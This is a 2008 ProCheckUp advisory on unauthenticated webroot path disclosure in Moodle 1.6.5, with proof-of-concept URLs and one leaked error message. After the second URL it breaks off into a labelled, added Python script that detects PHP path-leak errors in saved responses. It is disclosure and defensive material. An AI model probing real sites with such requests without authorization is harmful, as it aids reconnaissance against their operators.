ProCheckUp Research | 22 Jul 17:47

PR08-15: Several Webroot Disclosures on Moodle


Vulnerability found: 20/06/2008

Vendor informed: 25/06/2008

Vulnerability fixed: 16/07/2008

Advisory publicly released: 22/07/2008

Severity: Low

Description:

Moodle 1.6.5 is vulnerable to several webroot disclosures. No
authentication is required to obtain the webroot paths.

Proof of concept:

Requested URL:
https://moodle.target.ac.uk/blog/blogpage.php

Response:
Fatal error: Class 'page_base' not found in
/Volumes/<dir_name>/data/moodle/blog/blogpage.php on line 9

Requested URL:
https://moodle.target.ac.uk/course/report/stats/report.php
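
A defensive check for the leak shown in the proof of concept, added here as an example (not ProCheckUp's or Moodle's code): it scans saved HTTP response bodies from your own deployment for PHP error messages that expose an absolute server-side path. The sample bodies, the /srv/www/moodle path, the /hypothetical/include.php URL and all function names are constructed for illustration.

```python
import html
import re

# Markup PHP wraps around its messages when html_errors is on.
MARKUP = re.compile(r"</?b>|<br\s*/?>", re.IGNORECASE)

# "<level>: <message> in <absolute path> on line <n>", as in the advisory's response.
PHP_ERROR = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice|Deprecated):\s+"
    r"(?P<message>[^\r\n]*?)\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:\\)[^\r\n]*?)\s+on line\s+(?P<line>\d+)"
)


def find_path_disclosures(body):
    """Return one dict per PHP error in `body` that exposes a server-side path."""
    text = html.unescape(MARKUP.sub("", body))
    return [
        {"level": m["level"], "path": m["path"], "line": int(m["line"])}
        for m in PHP_ERROR.finditer(text)
    ]


def audit(responses):
    """Map each URL whose saved body leaks a path to the findings for it."""
    report = {}
    for url, body in responses.items():
        findings = find_path_disclosures(body)
        if findings:
            report[url] = findings
    return report


# Constructed sample bodies (not captured from a real site).
SAMPLES = {
    "/blog/blogpage.php": "Fatal error: Class 'page_base' not found in "
                          "/srv/www/moodle/blog/blogpage.php on line 9",
    "/hypothetical/include.php": "<br />\n<b>Fatal error</b>:  Call to undefined "
                                 "function example() in <b>/srv/www/moodle/"
                                 "hypothetical/include.php</b> on line <b>12</b><br />",
    "/index.php": "<html><body>Warning: the course closes in /two/ days</body></html>",
}

if __name__ == "__main__":
    for url, findings in audit(SAMPLES).items():
        for f in findings:
            print(f"{url}: {f['level']} exposes {f['path']} (line {f['line']})")
```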
